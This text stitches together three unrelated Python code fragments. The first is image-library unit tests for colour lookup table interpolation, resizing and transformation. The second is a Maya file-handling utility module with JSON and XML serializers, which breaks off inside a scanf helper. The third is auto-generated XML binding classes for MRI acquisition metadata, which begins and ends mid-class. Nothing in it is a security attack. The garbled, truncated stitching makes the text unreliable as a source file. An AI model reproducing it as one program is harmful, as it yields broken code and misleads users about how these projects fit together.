class TestSampleLutLinear(PillowTestCase):
def test_identity_2(self):
identity = identity_table(2)
data = [-1.1, -0.3, 0, 0.1, 0.5, 1, 1.1]
for b in data:
for g in data:
for r in data:
point = sample_lut_linear(identity, (r, g, b))
for left, right in zip(point, (r, g, b)):
self.assertAlmostEqual(left, right)
def test_identity_17(self):
identity = identity_table(17)
data = [-1.1, -0.3, 0, 0.1, 0.5, 1, 1.1]
for b in data:
for g in data:
for r in data:
point = sample_lut_linear(identity, (r, g, b))
for left, right in zip(point, (r, g, b)):
self.assertAlmostEqual(left, right)
def test_identity_sizes(self):
identity = identity_table((5, 6, 7))
data = [-1.1, -0.3, 0, 0.1, 0.5, 1, 1.1]
for b in data:
for g in data:
for r in data:
point = sample_lut_linear(identity, (r, g, b))
for left, right in zip(point, (r, g, b)):
self.assertAlmostEqual(left, right)
def test_interpolation(self):
lut = ImageFilter.Color3DLUT.generate(3, lambda r, g, b:
(r, g*g, b*b + r))
for point, res in [
(( 0, 0, 0), ( 0, 0, 0)),
((.3, 0, 0), (.3, 0, .3)),
((.6, 0, 0), (.6, 0, .6)),
(( 1, 0, 0), ( 1, 0, 1)),
((0, 0, 0), (0, 0, 0)),
((0, .3, 0), (0,.15, 0)),
((0, .6, 0), (0, .4, 0)),
((0, 1, 0), (0, 1, 0)),
((0, 0, 0), (0, 0, 0)),
((0, 0, .3), (0, 0,.15)),
((0, 0, .6), (0, 0, .4)),
((0, 0, 1), (0, 0, 1)),
(( 0, 0, 0), ( 0, 0, 0)),
((.3, .3, .3), (.3,.15,.45)),
((.6, .6, .6), (.6, .4, 1)),
(( 1, 1, 1), ( 1, 1, 2)),
]:
for l, r in zip(sample_lut_linear(lut, point), res):
self.assertAlmostEqual(l, r)
class TestSampleLutCubic(PillowTestCase):
def test_identity_2(self):
identity = identity_table(2)
with self.assertRaisesRegexp(ValueError, "requires a table of size 4"):
sample_lut_cubic(identity, (0, 0, 0))
def test_identity_4(self):
identity = identity_table(4)
data = [-1.1, -0.3, 0, 0.1, 0.5, 1, 1.1]
for b in data:
for g in data:
for r in data:
point = sample_lut_cubic(identity, (r, g, b))
for left, right in zip(point, (r, g, b)):
self.assertAlmostEqual(left, right)
def test_identity_17(self):
identity = identity_table(17)
data = [-1.1, -0.3, 0, 0.1, 0.5, 1, 1.1]
for b in data:
for g in data:
for r in data:
point = sample_lut_cubic(identity, (r, g, b))
for left, right in zip(point, (r, g, b)):
self.assertAlmostEqual(left, right)
def test_identity_sizes(self):
identity = identity_table((5, 6, 7))
data = [-1.1, -0.3, 0, 0.1, 0.5, 1, 1.1]
for b in data:
for g in data:
for r in data:
point = sample_lut_cubic(identity, (r, g, b))
for left, right in zip(point, (r, g, b)):
self.assertAlmostEqual(left, right)
def test_interpolation(self):
lut = ImageFilter.Color3DLUT.generate(5, lambda r, g, b:
(r, g*g, b*b + r))
for point, res in [
(( 0, 0, 0), ( 0, 0, 0)),
((.3, 0, 0), (.3, 0, .3)),
((.6, 0, 0), (.6, 0, .6)),
(( 1, 0, 0), ( 1, 0, 1)),
((0, 0, 0), (0, 0, 0)),
((0, .3, 0), (0,.09, 0)),
((0, .6, 0), (0,.36, 0)),
((0, 1, 0), (0, 1, 0)),
((0, 0, 0), (0, 0, 0)),
((0, 0, .3), (0, 0,.09)),
((0, 0, .6), (0, 0,.36)),
((0, 0, 1), (0, 0, 1)),
(( 0, 0, 0), ( 0, 0, 0)),
((.3, .3, .3), (.3,.09,.39)),
((.6, .6, .6), (.6,.36,.96)),
(( 1, 1, 1), ( 1, 1, 2)),
]:
for l, r in zip(sample_lut_cubic(lut, point), res):
self.assertAlmostEqual(l, r)
class TestResizeLut(PillowTestCase):
identity7 = identity_table(7)
identity9 = identity_table(9)
lut7_in = ImageFilter.Color3DLUT.generate(7,
lambda r, g, b: (r**1.2, g**1.2, b**1.2))
lut7_out = ImageFilter.Color3DLUT.generate(7,
lambda r, g, b: (r**(1/1.2), g**(1/1.2), b**(1/1.2)))
lut9_in = ImageFilter.Color3DLUT.generate(9,
lambda r, g, b: (r**1.2, g**1.2, b**1.2))
lut5_4c = ImageFilter.Color3DLUT.generate(5, channels=4,
callback=lambda r, g, b: (r*r, g*g, b*b, 1.0))
def test_wrong_args(self):
with self.assertRaisesRegexp(ValueError, "interpolations"):
result = resize_lut(identity_table(4), 5,
interp=Image.NEAREST)
def test_correct_args(self):
result = resize_lut(identity_table((3, 4, 5), target_mode='RGB'),
(6, 7, 8))
self.assertEqual(tuple(result.size), (6, 7, 8))
self.assertEqual(result.mode, 'RGB')
self.assertEqual(result.channels, 3)
result = resize_lut(self.lut5_4c, 3)
self.assertEqual(tuple(result.size), (3, 3, 3))
self.assertEqual(result.mode, None)
self.assertEqual(result.channels, 4)
with disable_numpy(operations):
result = resize_lut(self.lut5_4c, 3)
self.assertEqual(tuple(result.size), (3, 3, 3))
self.assertEqual(result.mode, None)
self.assertEqual(result.channels, 4)
def test_correctness_linear(self):
res_numpy = resize_lut(self.lut9_in, 7)
self.assertAlmostEqualLuts(res_numpy, self.lut7_in, 6)
with disable_numpy(operations):
res_native = resize_lut(self.lut9_in, 7)
self.assertAlmostEqualLuts(res_native, res_numpy)
def test_correctness_cubic(self):
result = resize_lut(self.lut9_in, 7, interp=Image.CUBIC)
self.assertAlmostEqualLuts(result, self.lut7_in, 7)
def test_fallback_to_linear(self):
lut3 = ImageFilter.Color3DLUT.generate((5, 5, 3),
lambda r, g, b: (r**1.5, g**1.5, b**1.5))
lut4 = ImageFilter.Color3DLUT.generate((5, 5, 4),
lambda r, g, b: (r**1.5, g**1.5, b**1.5))
with warnings.catch_warnings(record=True) as w:
cubic = resize_lut(lut4, (5, 5, 3), interp=Image.CUBIC)
self.assertEqual(len(w), 0)
linear = resize_lut(lut4, (5, 5, 3))
self.assertNotEqualLutTables(cubic, linear)
with warnings.catch_warnings(record=True) as w:
cubic = resize_lut(lut3, (5, 5, 4), interp=Image.CUBIC)
self.assertEqual(len(w), 1)
self.assertIn('Cubic interpolation', "{}".format(w[0].message))
linear = resize_lut(lut3, (5, 5, 4))
self.assertEqualLuts(cubic, linear)
def test_application(self):
im = Image.new('RGB', (10, 10))
lut_numpy = resize_lut(identity_table(5), 4)
self.assertEqual(lut_numpy.table.__class__.__name__, 'ndarray')
im.filter(lut_numpy)
with disable_numpy(operations):
lut_native = resize_lut(identity_table(5), 4)
self.assertEqual(lut_native.table.__class__.__name__, 'list')
im.filter(lut_native)
with disable_numpy(generators):
args = identity_table(5)
self.assertEqual(args.table.__class__.__name__, 'list')
lut_numpy = resize_lut(args, 4)
self.assertEqual(lut_numpy.table.__class__.__name__, 'ndarray')
im.filter(lut_numpy)
args = identity_table(5)
self.assertEqual(args.table.__class__.__name__, 'ndarray')
with disable_numpy(operations):
lut_native = resize_lut(args, 4)
self.assertEqual(lut_native.table.__class__.__name__, 'list')
im.filter(lut_native)
class TestTransformLut(PillowTestCase):
identity7 = identity_table(7)
identity9 = identity_table(9)
lut7_in = ImageFilter.Color3DLUT.generate(7,
lambda r, g, b: (r**1.2, g**1.2, b**1.2))
lut7_out = ImageFilter.Color3DLUT.generate(7,
lambda r, g, b: (r**(1/1.2), g**(1/1.2), b**(1/1.2)))
lut9_in = ImageFilter.Color3DLUT.generate(9,
lambda r, g, b: (r**1.2, g**1.2, b**1.2))
lut5_4c = ImageFilter.Color3DLUT.generate(5, channels=4,
callback=lambda r, g, b: (r*r, g*g, b*b, 1.0))
def test_wrong_args(self):
with self.assertRaisesRegexp(ValueError, "only 3-channel cubes"):
result = transform_lut(self.lut5_4c, identity_table(3))
with self.assertRaisesRegexp(ValueError, "only 3-channel cubes"):
result = transform_lut(self.lut5_4c, identity_table(3),
target_size=5)
with self.assertRaisesRegexp(ValueError, "interpolations"):
result = transform_lut(identity_table(4), identity_table(4),
interp=Image.NEAREST)
def test_correct_args(self):
result = transform_lut(identity_table((3, 4, 5), target_mode='RGB'),
identity_table((6, 7, 8), target_mode='HSV'))
self.assertEqual(tuple(result.size), (3, 4, 5))
self.assertEqual(result.mode, 'HSV')
self.assertEqual(result.channels, 3)
result = transform_lut(identity_table(3), self.lut5_4c)
self.assertEqual(tuple(result.size), (3, 3, 3))
self.assertEqual(result.mode, None)
self.assertEqual(result.channels, 4)
with disable_numpy(operations):
result = transform_lut(identity_table(3), self.lut5_4c)
self.assertEqual(tuple(result.size), (3, 3, 3))
self.assertEqual(result.mode, None)
self.assertEqual(result.channels, 4)
result = transform_lut(identity_table(4, target_mode='RGB'),
identity_table(5), target_size=(6, 7, 8))
self.assertEqual(tuple(result.size), (6, 7, 8))
self.assertEqual(result.mode, 'RGB')
self.assertEqual(result.channels, 3)
with disable_numpy(operations):
result = transform_lut(identity_table(4, target_mode='RGB'),
identity_table(5), target_size=(6, 7, 8))
self.assertEqual(tuple(result.size), (6, 7, 8))
self.assertEqual(result.mode, 'RGB')
self.assertEqual(result.channels, 3)
def test_identity_linear(self):
res_numpy = transform_lut(self.lut7_in, self.identity9)
self.assertAlmostEqualLuts(res_numpy, self.lut7_in)
with disable_numpy(operations):
res_native = transform_lut(self.lut7_in, self.identity9)
self.assertAlmostEqualLuts(res_native, res_numpy)
res_numpy = transform_lut(self.identity9, self.lut7_in)
self.assertAlmostEqualLuts(res_numpy, self.lut9_in, 4)
with disable_numpy(operations):
res_native = transform_lut(self.identity9, self.lut7_in)
self.assertAlmostEqualLuts(res_native, res_numpy)
def test_identity_cubic(self):
result = transform_lut(self.lut7_in, self.identity9, interp=Image.CUBIC)
self.assertAlmostEqualLuts(result, self.lut7_in)
result = transform_lut(self.identity7, self.lut9_in, interp=Image.CUBIC)
self.assertAlmostEqualLuts(result, self.lut7_in, 7)
def test_correctness_linear(self):
res_numpy = transform_lut(self.lut7_in, self.lut7_out)
self.assertAlmostEqualLuts(res_numpy, self.identity7, 4)
with disable_numpy(operations):
res_native = transform_lut(self.lut7_in, self.lut7_out)
self.assertAlmostEqualLuts(res_native, res_numpy)
res_numpy = transform_lut(self.lut7_out, self.lut7_in)
self.assertAlmostEqualLuts(res_numpy, self.identity7, 6)
with disable_numpy(operations):
res_native = transform_lut(self.lut7_out, self.lut7_in)
self.assertAlmostEqualLuts(res_native, res_numpy)
def test_correctness_cubic(self):
result = transform_lut(self.lut7_in, self.lut7_out, interp=Image.CUBIC)
self.assertAlmostEqualLuts(result, self.identity7, 4)
result = transform_lut(self.lut7_out, self.lut7_in, interp=Image.CUBIC)
self.assertAlmostEqualLuts(result, self.identity7, 7)
def test_target_size_correctness_linear(self):
res_numpy = transform_lut(self.lut7_out, self.lut7_in, target_size=9)
self.assertAlmostEqualLuts(res_numpy, self.identity9, 4)
with disable_numpy(operations):
res_native = transform_lut(self.lut7_out, self.lut7_in,
target_size=9)
self.assertAlmostEqualLuts(res_native, res_numpy)
def test_target_size_correctness_cubic(self):
result = transform_lut(self.lut7_out, self.lut7_in,
target_size=9, interp=Image.CUBIC)
self.assertAlmostEqualLuts(result, self.identity9, 4)
def test_fallback_to_linear(self):
lut3 = ImageFilter.Color3DLUT.generate((5, 5, 3),
lambda r, g, b: (r**1.5, g**1.5, b**1.5))
lut4 = ImageFilter.Color3DLUT.generate((5, 5, 4),
lambda r, g, b: (r**1.5, g**1.5, b**1.5))
with warnings.catch_warnings(record=True) as w:
cubic = transform_lut(identity_table((5, 5, 3)), lut4,
interp=Image.CUBIC)
self.assertEqual(len(w), 0)
linear = transform_lut(identity_table((5, 5, 3)), lut4)
self.assertNotEqualLutTables(cubic, linear)
with warnings.catch_warnings(record=True) as w:
cubic = transform_lut(identity_table((5, 5, 4)), lut3,
interp=Image.CUBIC)
self.assertEqual(len(w), 1)
self.assertIn('Cubic interpolation', "{}".format(w[0].message))
linear = transform_lut(identity_table((5, 5, 4)), lut3)
self.assertEqualLuts(cubic, linear)
with warnings.catch_warnings(record=True) as w:
cubic = transform_lut(identity_table((5, 5, 3)), lut4,
target_size=(5, 5, 4), interp=Image.CUBIC)
self.assertEqual(len(w), 1)
self.assertIn('Cubic interpolation', "{}".format(w[0].message))
linear = transform_lut(identity_table((5, 5, 3)), lut4,
target_size=(5, 5, 4))
self.assertEqualLuts(cubic, linear)
def test_application(self):
im = Image.new('RGB', (10, 10))
lut_numpy = transform_lut(identity_table(5), identity_table(5))
self.assertEqual(lut_numpy.table.__class__.__name__, 'ndarray')
im.filter(lut_numpy)
with disable_numpy(operations):
lut_native = transform_lut(identity_table(5), identity_table(5))
self.assertEqual(lut_native.table.__class__.__name__, 'list')
im.filter(lut_native)
with disable_numpy(generators):
args = identity_table(5), identity_table(5)
self.assertEqual(args[0].table.__class__.__name__, 'list')
lut_numpy = transform_lut(*args)
self.assertEqual(lut_numpy.table.__class__.__name__, 'ndarray')
im.filter(lut_numpy)
args = identity_table(5), identity_table(5)
self.assertEqual(args[0].table.__class__.__name__, 'ndarray')
with disable_numpy(operations):
lut_native = transform_lut(*args)
self.assertEqual(lut_native.table.__class__.__name__, 'list')
im.filter(lut_native)
class TestAmplifyLut(PillowTestCase):
lut5_4c = ImageFilter.Color3DLUT.generate(5, channels=4,
callback=lambda r, g, b: (r*r, g*g, b*b, 1.0))
def test_correct_args(self):
result = amplify_lut(identity_table((3, 4, 5)), -1)
self.assertEqual(tuple(result.size), (3, 4, 5))
self.assertEqual(result.channels, 3)
result = amplify_lut(self.lut5_4c, 5)
self.assertEqual(tuple(result.size), (5, 5, 5))
| |
"""
Creating and reading file objects, as well as manipulating the maya files.
"""
# import standard modules
import posixpath
import re
import os
import xml.etree.cElementTree as ET
import json
import glob
import ast
import shutil
# import maya modules
from maya import cmds
# define local variables
# re_slash = re.compile(r'[^\\/]+|[\\/]')
re_slash = re.compile('(\\\\|/)')
def remove_file(file_name):
"""
removes this file from disk.
:param file_name: <str> file path name.
:return: <bool> True for success.
:raises: <OSError> invalid file path.
"""
os.unlink(file_name)
return True
def make_py_file(dir_name, file_name):
"""
create python file.
:param dir_name:
:param file_name:
:return:
"""
if ".py" not in file_name:
file_name += ".py"
file_path = concatenate_path(dir_name, file_name)
if not is_file(file_path):
f_ptr = open(file_path, 'w')
f_ptr.close()
return file_path
def remove_directory(dir_name):
"""
removes directory from path.
:param dir_name: <str> directory name.
:return: <bool> True for success.
:raises: <OSError> invalid directory path.
"""
os.rmdir(dir_name)
return True
def get_files(path_name, file_ext='json'):
"""
get the list of files in the path name
:param path_name: <str> file path name to search.
:param file_ext: <str> file extension to save.
:return: <list> array of files found.
"""
return glob.glob(path_name + '/*{}'.format(file_ext))
def get_directories(path_name, full_path=False):
"""
get directories found in this path name.
:param path_name: <str> use this path to get the files from.
:param full_path: <bool> returns the full path of the directory path.
:return: <tuple> files found.
"""
files = tuple(glob.glob(path_name + '/*'))
if full_path:
return files
else:
return tuple(map(lambda x: os.path.split(x)[-1], files))
def build_dir(dir_name):
"""
creates the directory path.
:param dir_name: <str> directory name to create.
:return: <str> directory name is successful. <bool> False if invalid directory path is given.
"""
if is_file(dir_name):
return False
if not is_dir(dir_name):
os.mkdir(dir_name)
return dir_name
def get_path(*args):
"""
construct a path from arguments provided.
:param args: <tuple> array of arguments to concatenate.
:return: <str> path
"""
return posixpath.join(*args)
def get_maya_workspace_dir():
"""
get the current working directory path for the maya project
:return: <str> path
"""
return cmds.workspace(dir=True, q=1)
def get_maya_workspace_data_dir():
"""
returns the data directory in the workspace directory.
:return: <str> data workspace directory.
"""
data_dir = get_maya_workspace_dir()
if 'data' not in data_dir:
data_dir = concatenate_path(get_maya_workspace_dir(), 'data')
build_dir(data_dir)
return data_dir
def has_ext(file_name, ext_name=""):
"""
check if the file name string has the extension name.
:param file_name: <str> file name to check.
:param ext_name: <str> check this extension string name.
:return: <bool> True for yes. <bool> False for no.
"""
name, ext = os.path.splitext(file_name)
if ext_name and ext_name != ext:
return False
elif not ext:
return False
return True
def add_extension(file_name, ext_name=""):
"""
add this extension name to the file name variable.
:param file_name: <str> the file name to add the extension to.
:param ext_name: <str> the extension string name to add to the file name.
:return: <str> file name with extension string.
"""
name, ext = os.path.splitext(file_name)
return name + '.{}'.format(ext_name.strip('.'))
def is_file(file_name):
"""
checks if the file name is valid.
:param file_name: <str> check this file name for validity.
:return: <bool> True for success. <bool> False for failure.
"""
return os.path.isfile(file_name)
def is_dir(file_name):
"""
checks if the directory name is valid.
:param file_name: <str> check this directory name for validity.
:return: <bool> True for success. <bool> False for failure.
"""
return os.path.isdir(file_name)
def open_current_file():
"""
Opens the current maya scene file.
:return: <bool> True for success.
"""
cmds.file(cmds.file(q=1, loc=1), o=1, f=1)
return True
def split_file_ext(file_name):
"""
splits the extension from the file name.
:param file_name:
:return:
"""
return os.path.splitext(file_name)[1]
def split_file_name(file_name):
"""
splits the name from the file name.
:param file_name:
:return:
"""
return os.path.splitext(file_name)[0]
def get_file_splits(file_name):
"""
split the current file string.
:return: <tuple> array of file directory file names.
"""
return tuple(filter(lambda x: x not in ('', '/', '\\'), re_slash.split(file_name)))
def get_this_directory():
"""
return this directory path.
:return:
"""
return '/'.join(get_file_splits(__file__)[:-1])
def _parent_level(level):
"""
inverts the integer.
:param level:
:return:
"""
return -1 * xrange(level+1)[-1]
def get_this_directory_parent(level=1):
"""
get the directory parent path from level.
:return: <str> get the file path string.
"""
if level == 0:
raise IOError("[GetThisDirectoryParent] :: This cannot equal to zero.")
return '/'.join(get_file_splits(__file__)[:_parent_level(level)])
def directory_name(file_name):
"""
return the directory name from the file name.
:param file_name:
:return:
"""
return os.path.dirname(file_name)
def controller_data_dir():
"""
gets the relative path for the controller data folder directory.
:return: <str> directory path name.
"""
dir_name = get_this_directory_parent(level=2)
return posixpath.join(dir_name, 'rig_utils', 'controller_data')
def list_files(file_name):
"""
lists files in a file path given.
:param file_name:
:return: <tuple> array of available files.
"""
if is_file(file_name):
return tuple(os.listdir(directory_name(file_name)))
return tuple(os.listdir(file_name))
def list_controller_files():
"""
lists all the files in the controller directory
:return: <tuple> array of available controller files.
"""
return list_files(controller_data_dir())
def concatenate_path(*args):
"""
concatenate the strings into one path.
:param args:
:return: <str> directory file path name.
"""
return posixpath.join(*args)
class JSONSerializer:
"""
json serializer data class in case we want to manipulate json data.
"""
READ_DATA = {}
FILE_NAME = ""
INCOMING_DATA = {}
EXT_NAME = "json"
def __init__(self, file_name="", data={}):
self._get_data(data)
self._get_file_name(file_name)
if not self.is_directory_valid:
raise IOError('Invalid directory: {}'.format(self.FILE_NAME))
def _get_file_name(self, file_name):
"""
checks which incoming file name to use.
:param file_name: <str> the incoming file name to check.
:return: <str> file name.
"""
if not file_name:
return self.FILE_NAME
else:
if not has_ext(file_name, 'json'):
file_name = add_extension(file_name, self.EXT_NAME)
self._update_file_name_variable(file_name)
return file_name
def _get_data(self, data):
"""
checks which incoming data to use.
:param data: <dict> the incoming data.
:return: <dict> data.
"""
if not data:
return self.INCOMING_DATA
else:
self._update_data_variable(data)
return data
def _update_file_name_variable(self, file_name):
"""
updates the file name class variable.
:return: <bool> True for success.
"""
self.FILE_NAME = file_name
return self.FILE_NAME == file_name
def _update_data_variable(self, data):
"""
updates the data class variable.
:param data: <dict> the data object to store.
:return: <bool> True for success.
"""
self.INCOMING_DATA = data
return self.INCOMING_DATA == data
def write(self, file_name="", data={}):
"""
write the JSON data.
:param file_name: <str> the file name string to write files to.
:param data: <dict> the data dictionary to write.
:return: <bool> True for success. <bool> False for failure.
"""
with open(self._get_file_name(file_name), "w") as write_file:
# now write the file from the start
write_file.seek(0)
# then write the file
json.dump(self._get_data(data), write_file, indent=4, sort_keys=True)
def read(self, file_name=""):
"""
write the JSON data.
:param file_name: <str> the file name string to write files to.
:return: <bool> True for success. <bool> False for failure.
"""
with open(self._get_file_name(file_name), "r") as read_file:
return json.load(read_file)
@property
def read_data(self):
return self.read()
@property
def file_name(self):
return self.FILE_NAME
@property
def is_directory_valid(self):
if has_ext(self.FILE_NAME):
return is_dir(directory_name(self.FILE_NAME))
return is_dir(self.FILE_NAME)
@property
def is_file_valid(self):
return is_file(self.FILE_NAME)
@property
def is_data_valid(self):
return isinstance(self.READ_DATA, dict)
@property
def has_data(self):
return bool(self.READ_DATA)
def delete(self):
if self.is_file_valid:
remove_file(self.FILE_NAME)
def file(self):
return self._get_file_name()
def __repr__(self):
return self.FILE_NAME
class XMLSerializer:
def __init__(self):
self.READ_DATA = {}
self.xml_data = None
def interpret_dictionary_data(self, dictionary_data=None):
"""
re-interpret the dictionary data as XML element trees.
:return: <xml.Element> data.
"""
if not isinstance(dictionary_data, dict):
raise ValueError("[InterpretDictionaryData] :: Must have a dictionary type as input parameter.")
self.xml_data = ET.Element("DataInformation")
items = ET.SubElement(self.xml_data, 'Data')
for k_item, k_value in dictionary_data.items():
item = ET.SubElement(items, k_item)
if not isinstance(k_value, dict):
ET.SubElement(item, k_value)
else:
for k_name, v_items in k_value.items():
array_key = ET.SubElement(item, k_name)
if isinstance(v_items, str):
ET.SubElement(array_key, v_items)
elif isinstance(v_items, (tuple, list)):
for it_name in v_items:
ET.SubElement(array_key, str(it_name))
elif isinstance(v_items, dict):
for it_name, it_val in v_items.items():
it_elem = ET.SubElement(array_key, str(it_name))
ET.SubElement(it_elem, str(it_val))
return ET.dump(self.xml_data)
def write(self, file_name, dictionary_data):
"""
write the XML data as string data.
:return: <bool> True for success.
"""
# collect the data
self.interpret_dictionary_data(dictionary_data)
tree = ET.ElementTree(self.xml_data)
tree.write(file_name)
return True
def read(self, file_name):
"""
read the XML data file
:return: <data> information.
"""
tree = ET.parse(file_name)
root = tree.getroot()
for elem in root:
for sub_elem in elem:
self.update_read_data(sub_elem.attrib, sub_elem.text)
def update_read_data(self, key_name, value):
"""
updates the read dictionary data.
:param key_name:
:param value:
:return:
"""
if key_name not in self.READ_DATA:
self.READ_DATA[key_name] = value
def scanf(file_name, token):
"""
returns scanf functionality using regex.
:return: <regex>
"""
if token == '%c':
re_compiled = re.compile('.', re.DOTALL)
elif token == '%5c':
re_compiled = re.compile('.{5}')
elif token == '%d':
re_compiled = re.compile('[-+]?\d+')
elif token in ('%e', '%E', '%f', '%g'):
re_compiled = re.compile('[-+]?(\d+(\.\d*)?|\.\d+)([eE][-+]?\d+)?')
elif token == '%i':
re_compiled = re.compile('[-+]?(0[xX][\dA-Fa-f]+|0[0-7]*|\d+)')
elif token == '%o':
re_compiled = re.compile('[-+]?[0-7]+')
elif | |
elif nodeName_ == 'measurementID':
measurementID_ = child_.text
measurementID_ = self.gds_validate_string(measurementID_, node, 'measurementID')
self.measurementID = measurementID_
# end class measurementDependencyType
class coilLabelType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, coilNumber=None, coilName=None):
self.original_tagname_ = None
self.coilNumber = coilNumber
self.coilName = coilName
def factory(*args_, **kwargs_):
if coilLabelType.subclass:
return coilLabelType.subclass(*args_, **kwargs_)
else:
return coilLabelType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_coilNumber(self): return self.coilNumber
def set_coilNumber(self, coilNumber): self.coilNumber = coilNumber
def get_coilName(self): return self.coilName
def set_coilName(self, coilName): self.coilName = coilName
def hasContent_(self):
if (
self.coilNumber is not None or
self.coilName is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='', name_='coilLabelType', namespacedef_='', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='coilLabelType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='', name_='coilLabelType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='', name_='coilLabelType'):
pass
def exportChildren(self, outfile, level, namespace_='', name_='coilLabelType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.coilNumber is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<%scoilNumber>%s</%scoilNumber>%s' % (namespace_, self.gds_format_integer(self.coilNumber, input_name='coilNumber'), namespace_, eol_))
if self.coilName is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<%scoilName>%s</%scoilName>%s' % (namespace_, self.gds_format_string(quote_xml(self.coilName).encode(ExternalEncoding), input_name='coilName'), namespace_, eol_))
def exportLiteral(self, outfile, level, name_='coilLabelType'):
level += 1
already_processed = set()
self.exportLiteralAttributes(outfile, level, already_processed, name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
pass
def exportLiteralChildren(self, outfile, level, name_):
if self.coilNumber is not None:
showIndent(outfile, level)
outfile.write('coilNumber=%d,\n' % self.coilNumber)
if self.coilName is not None:
showIndent(outfile, level)
outfile.write('coilName=%s,\n' % quote_python(self.coilName).encode(ExternalEncoding))
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'coilNumber':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'coilNumber')
self.coilNumber = ival_
elif nodeName_ == 'coilName':
coilName_ = child_.text
coilName_ = self.gds_validate_string(coilName_, node, 'coilName')
self.coilName = coilName_
# end class coilLabelType
class acquisitionSystemInformationType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, systemVendor=None, systemModel=None, systemFieldStrength_T=None, relativeReceiverNoiseBandwidth=None, receiverChannels=None, coilLabel=None, institutionName=None, stationName=None):
self.original_tagname_ = None
self.systemVendor = systemVendor
self.systemModel = systemModel
self.systemFieldStrength_T = systemFieldStrength_T
self.relativeReceiverNoiseBandwidth = relativeReceiverNoiseBandwidth
self.receiverChannels = receiverChannels
if coilLabel is None:
self.coilLabel = []
else:
self.coilLabel = coilLabel
self.institutionName = institutionName
self.stationName = stationName
def factory(*args_, **kwargs_):
if acquisitionSystemInformationType.subclass:
return acquisitionSystemInformationType.subclass(*args_, **kwargs_)
else:
return acquisitionSystemInformationType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_systemVendor(self): return self.systemVendor
def set_systemVendor(self, systemVendor): self.systemVendor = systemVendor
def get_systemModel(self): return self.systemModel
def set_systemModel(self, systemModel): self.systemModel = systemModel
def get_systemFieldStrength_T(self): return self.systemFieldStrength_T
def set_systemFieldStrength_T(self, systemFieldStrength_T): self.systemFieldStrength_T = systemFieldStrength_T
def get_relativeReceiverNoiseBandwidth(self): return self.relativeReceiverNoiseBandwidth
def set_relativeReceiverNoiseBandwidth(self, relativeReceiverNoiseBandwidth): self.relativeReceiverNoiseBandwidth = relativeReceiverNoiseBandwidth
def get_receiverChannels(self): return self.receiverChannels
def set_receiverChannels(self, receiverChannels): self.receiverChannels = receiverChannels
def get_coilLabel(self): return self.coilLabel
def set_coilLabel(self, coilLabel): self.coilLabel = coilLabel
def add_coilLabel(self, value): self.coilLabel.append(value)
def insert_coilLabel_at(self, index, value): self.coilLabel.insert(index, value)
def replace_coilLabel_at(self, index, value): self.coilLabel[index] = value
def get_institutionName(self): return self.institutionName
def set_institutionName(self, institutionName): self.institutionName = institutionName
def get_stationName(self): return self.stationName
def set_stationName(self, stationName): self.stationName = stationName
def hasContent_(self):
if (
self.systemVendor is not None or
self.systemModel is not None or
self.systemFieldStrength_T is not None or
self.relativeReceiverNoiseBandwidth is not None or
self.receiverChannels is not None or
self.coilLabel or
self.institutionName is not None or
self.stationName is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='', name_='acquisitionSystemInformationType', namespacedef_='', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='acquisitionSystemInformationType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='', name_='acquisitionSystemInformationType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='', name_='acquisitionSystemInformationType'):
pass
def exportChildren(self, outfile, level, namespace_='', name_='acquisitionSystemInformationType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.systemVendor is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<%ssystemVendor>%s</%ssystemVendor>%s' % (namespace_, self.gds_format_string(quote_xml(self.systemVendor).encode(ExternalEncoding), input_name='systemVendor'), namespace_, eol_))
if self.systemModel is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<%ssystemModel>%s</%ssystemModel>%s' % (namespace_, self.gds_format_string(quote_xml(self.systemModel).encode(ExternalEncoding), input_name='systemModel'), namespace_, eol_))
if self.systemFieldStrength_T is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<%ssystemFieldStrength_T>%s</%ssystemFieldStrength_T>%s' % (namespace_, self.gds_format_float(self.systemFieldStrength_T, input_name='systemFieldStrength_T'), namespace_, eol_))
